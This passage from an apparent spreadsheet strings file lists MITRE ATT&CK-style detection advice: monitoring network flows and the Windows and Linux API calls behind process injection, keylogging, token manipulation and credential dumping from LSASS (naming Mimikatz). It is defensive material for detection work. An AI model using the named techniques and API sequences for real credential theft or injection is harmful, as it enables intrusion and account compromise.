    <t>Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.</t>
  </si>
  <si>
    <t>Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).</t>
  </si>
  <si>
    <t>Monitor and analyze network flows associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider analyzing newly constructed network connections that are sent or received by untrusted hosts, unexpected hardware devices, or other uncommon data flows.</t>
  </si>
  <si>
    <t>Monitor for DNS traffic to/from known-bad or suspicious domains and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).</t>
  </si>
  <si>
    <t>Monitor for network traffic originating from unknown/unexpected hardware devices.</t>
  </si>
  <si>
    <t>Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more. (Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA. (Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated(Citation: Elastic Predicting DGA)]</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows., such as the usage of abnormal/unexpected protocols.</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows, such as unexpected surges or other abnormal inbound/outbound patterns.</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems.If attempts are detected, then investigate endpoint data sources to find the root cause.</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware. </t>
  </si>
  <si>
    <t>Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port.</t>
  </si>
  <si>
    <t>Monitor and analyze network flows associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider analyzing newly constructed network connections that are sent or received by untrusted hosts, unexpcted hardware devices, or other uncommon data flows.</t>
  </si>
  <si>
    <t>Monitor network traffic for uncommon data flows that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP).</t>
  </si>
  <si>
    <t>Monitor network data for uncommon data flows that may be related to abuse of [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as RDP, telnet, SSH, and VNC.</t>
  </si>
  <si>
    <t>Monitor network data for uncommon SMB data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.</t>
  </si>
  <si>
    <t>Monitor for web traffic to/from known-bad or suspicious domains and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).</t>
  </si>
  <si>
    <t>Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055). Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>Monitor for API calls, loaded by a payload, for token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.</t>
  </si>
  <si>
    <t>Monitor and analyze application programming interface (API) calls that are indicative of Registry edits, such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls (such as &lt;code&gt;GetForegroundWindow()&lt;/code&gt;) that may attempt to get a listing of open application windows. </t>
  </si>
  <si>
    <t>Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Monitor for API calls associated with leveraging a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.</t>
  </si>
  <si>
    <t>Monitor for API calls that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>Monitor for Windows API calls that may clear Windows Event Logs to hide the activity of an intrusion.</t>
  </si>
  <si>
    <t>Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.</t>
  </si>
  <si>
    <t>Monitor for API calls associated with the use of device drivers and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.</t>
  </si>
  <si>
    <t>Monitor for API calls that may forge web cookies that can be used to gain access to web applications or Internet services.</t>
  </si>
  <si>
    <t>Monitor for API calls associated with detecting token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior. Analysts can also monitor for use of Windows APIs such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Monitor for API calls that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Monitor for API calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)</t>
  </si>
  <si>
    <t>Monitor for API calls that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>Monitor for API calls that may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Monitor for API calls associated with altering data. Remote access tools with built-in features may interact directly with the Windows API to gather information.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. </t>
  </si>
  <si>
    <t>Monitor for API calls (such as &lt;code&gt;IsDebuggerPresent()&lt;/code&gt;) that may employ various means to detect and avoid debugged environments. Detecting actions related to debugger identification may be difficult depending on the adversary's implementation and monitoring required.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to gather information about domain accounts such as type of user, privileges and groups.</t>
  </si>
  <si>
    <t>Monitor for API calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller</t>
  </si>
  <si>
    <t>Monitor for API calls associated with finding domain-level groups and permission settings, such as NetGroupEnum</t>
  </si>
  <si>
    <t>Monitor for API calls associated with gathering information on domain trust relationships that may be used to identify lateral movement like DSEnumerateDomainTrusts() Win32 API call to spot activity associated with Domain Trust Discovery.(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as PowerShell. The .NET method GetAllTrustRelationships() can be an indicator of Domain Trust Discovery.(Citation: Microsoft GetAllTrustRelationships)</t>
  </si>
  <si>
    <t>Monitor and analyze calls to functions such as  `GetProcAddress()` and `LoadLibrary()` that are associated with dynamically loading API functions.(Citation: Huntress API Hash)</t>
  </si>
  <si>
    <t>Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt; and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected usage of syscalls such as `mount` that may indicate an attempt to escape from a privileged container to host. </t>
  </si>
  <si>
    <t>Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor for API calls that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>Monitor for API calls to SetWindowsHook, GetKeyState, and GetAsyncKeyState (Citation: Adventures of a Keystroke)</t>
  </si>
  <si>
    <t>Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances. for known bad sequence of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;WriteProcessMemory()&lt;/code&gt; and &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; with the parameter set to &lt;code&gt;ProcessBasicInformation&lt;/code&gt; may be used for this technique.(Citation: Lazarus APT January 2022)</t>
  </si>
  <si>
    <t>Monitor for Keychain Services API calls, specifically legacy extensions such as &lt;code&gt;SecKeychainFindInternetPassword&lt;/code&gt;, that may collect Keychain data from a system to acquire credentials.(Citation: Keychain Items Apple Dev API)</t>
  </si>
  <si>
    <t>Monitor for API calls to the SetWindowsHook, GetKeyState, and GetAsyncKeyState.(Citation: Adventures of a Keystroke) and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).</t>
  </si>
  <si>
    <t xml:space="preserve">Consider monitoring for excessive use of &lt;code&gt;SendMessage&lt;/code&gt; and/or &lt;code&gt;PostMessage&lt;/code&gt; API functions with &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and/or &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; arguments.
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;FindWindow&lt;/code&gt;, &lt;code&gt;FindWindowEx&lt;/code&gt;, &lt;code&gt;EnumWindows&lt;/code&gt;, &lt;code&gt;EnumChildWindows&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be abused for this technique. </t>
  </si>
  <si>
    <t>Monitor for API calls (such as &lt;code&gt;NetUserEnum()&lt;/code&gt;) that may attempt to gather local accounts information such as type of user, privileges and groups.</t>
  </si>
  <si>
    <t>Monitor for API calls associated with finding local system groups and permission settings, such as NetLocalGroupEnum.</t>
  </si>
  <si>
    <t>Monitor for API calls associated with detecting token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior, such as LogonUser and SetThreadToken. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators</t>
  </si>
  <si>
    <t>Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016). </t>
  </si>
  <si>
    <t>Monitor for API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt; Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)</t>
  </si>
  <si>
    <t>Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient.</t>
  </si>
  <si>
    <t>Monitor for API calls that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.</t>
  </si>
  <si>
    <t>Monitor and analyze calls to functions such as  `GetProcAddress()` that are associated with malicious code obfuscation.(Citation: Huntress API Hash)</t>
  </si>
  <si>
    <t>Monitor for API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019)This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to gather information about attached peripheral devices and components connected to a computer system.</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor)</t>
  </si>
  <si>
    <t>Monitor for API calls that may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. Disk check, forensic utilities, and data from device drivers (i.e. API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls may attempt to get information about running processes on a system. </t>
  </si>
  <si>
    <t>Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)</t>
  </si>
  <si>
    <t>Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017) Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)</t>
  </si>
  <si>
    <t>Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls (such as &lt;code&gt;RegOpenKeyExA&lt;/code&gt;) that may interact with the Windows Registry to gather information about the system, configuration, and installed software. </t>
  </si>
  <si>
    <t>Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as &lt;code&gt;Assembly.Load()&lt;/code&gt; and [Native API](https://attack.mitre.org/techniques/T1106) functions such as &lt;code&gt;CreateThread()&lt;/code&gt;, &lt;code&gt;memfd_create()&lt;/code&gt;, &lt;code&gt;execve()&lt;/code&gt;, and/or &lt;code&gt;execveat()&lt;/code&gt;.(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)</t>
  </si>
  <si>
    <t>Monitor for API calls, such as PowerShell's Get-ADUser cmdlet or Windows API DsAddSidHistory function,  to examine data in user’s SID-History attributes, especially users who have SID-History values from the same domain.</t>
  </si>
  <si>
    <t>Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk, such as &lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt;, or &lt;code&gt;screencapture&lt;/code&gt;.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware). The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Monitor for API calls that may execute malicious payloads via loading shared modules.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls that bypass process and/or signature based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. </t>
  </si>
  <si>
    <t>Monitor for API calls that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.</t>
  </si>
  <si>
    <t>Remote access tools with built-in features may interact directly with the Windows API, such as calling &lt;code&gt; GetLocaleInfoW&lt;/code&gt; to gather information.(Citation: FBI Ragnar Locker 2020)</t>
  </si>
  <si>
    <t>Monitor for API calls (such as &lt;code&gt;GetAdaptersInfo()&lt;/code&gt; and &lt;code&gt;GetIpNetTable()&lt;/code&gt;) that may gather details about the network configuration and settings, such as IP and/or MAC addresses.</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</t>
  </si>
  <si>
    <t>Monitor for API calls associated with gathering information about registered local system services, such as QueryServiceStatusEx.</t>
  </si>
  <si>
    <t>Monitor for API calls that may gather the system time and/or time zone from a local or remote system. Remote access tools with built-in features may interact directly with the Windows API to gather information.</t>
  </si>
  <si>
    <t>Monitor for API calls that may employ various time-based methods to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls associated with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators, such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken. </t>
  </si>
  <si>
    <t>Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits)</t>
  </si>
  <si>
    <t>Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system. Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.</t>
  </si>
  <si>
    <t>Consider monitoring API calls such as &lt;code&gt;CredEnumerateA&lt;/code&gt; that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)</t>
  </si>
  <si>
    <t>Monitor for API calls that may create or modify Windows services (ex: ` CreateServiceW()`) to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Monitor for logged domain name system (DNS) data that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor for logged domain name system (DNS) data that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor for logged domain name system (DNS) registry data that may compromise third-party DNS servers that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor for logged domain name system (DNS) registry data that may hijack domains and/or subdomains that can be used during targeting.Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor logged domain name system (DNS) data for purchased domains that can be used during targeting. Reputation/category-based detection may be difficult until the categorization is updated. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control. </t>
  </si>
  <si>
    <t>Monitor for newly constructed pods that may deploy a container into an environment to facilitate execution or evade defenses.</t>
  </si>
  <si>
    <t>Monitor logs for actions that could be taken to gather information about pods, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications.</t>
  </si>
  <si>
    <t>Monitor for changes made to pods for unexpected modifications to settings and/or control data that may deploy a container into an environment to facilitate execution or evade defenses.</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.</t>
  </si>
  <si>
    <t>Monitor for processes being accessed that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.</t>
  </si>
  <si>
    <t>Monitor for process being viewed that may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for processes making abnormal calls to higher privileged processes, such as a user application connecting to a VPN service.(Citation: versprite xpc vpn)</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts.</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
##### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&amp;lt;pid&amp;gt;/maps&lt;/code&gt;, where the &lt;code&gt;&amp;lt;pid&amp;gt;&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Monitor process being accessed that may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019)</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for processes being accessed that may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain.</t>
  </si>
  <si>
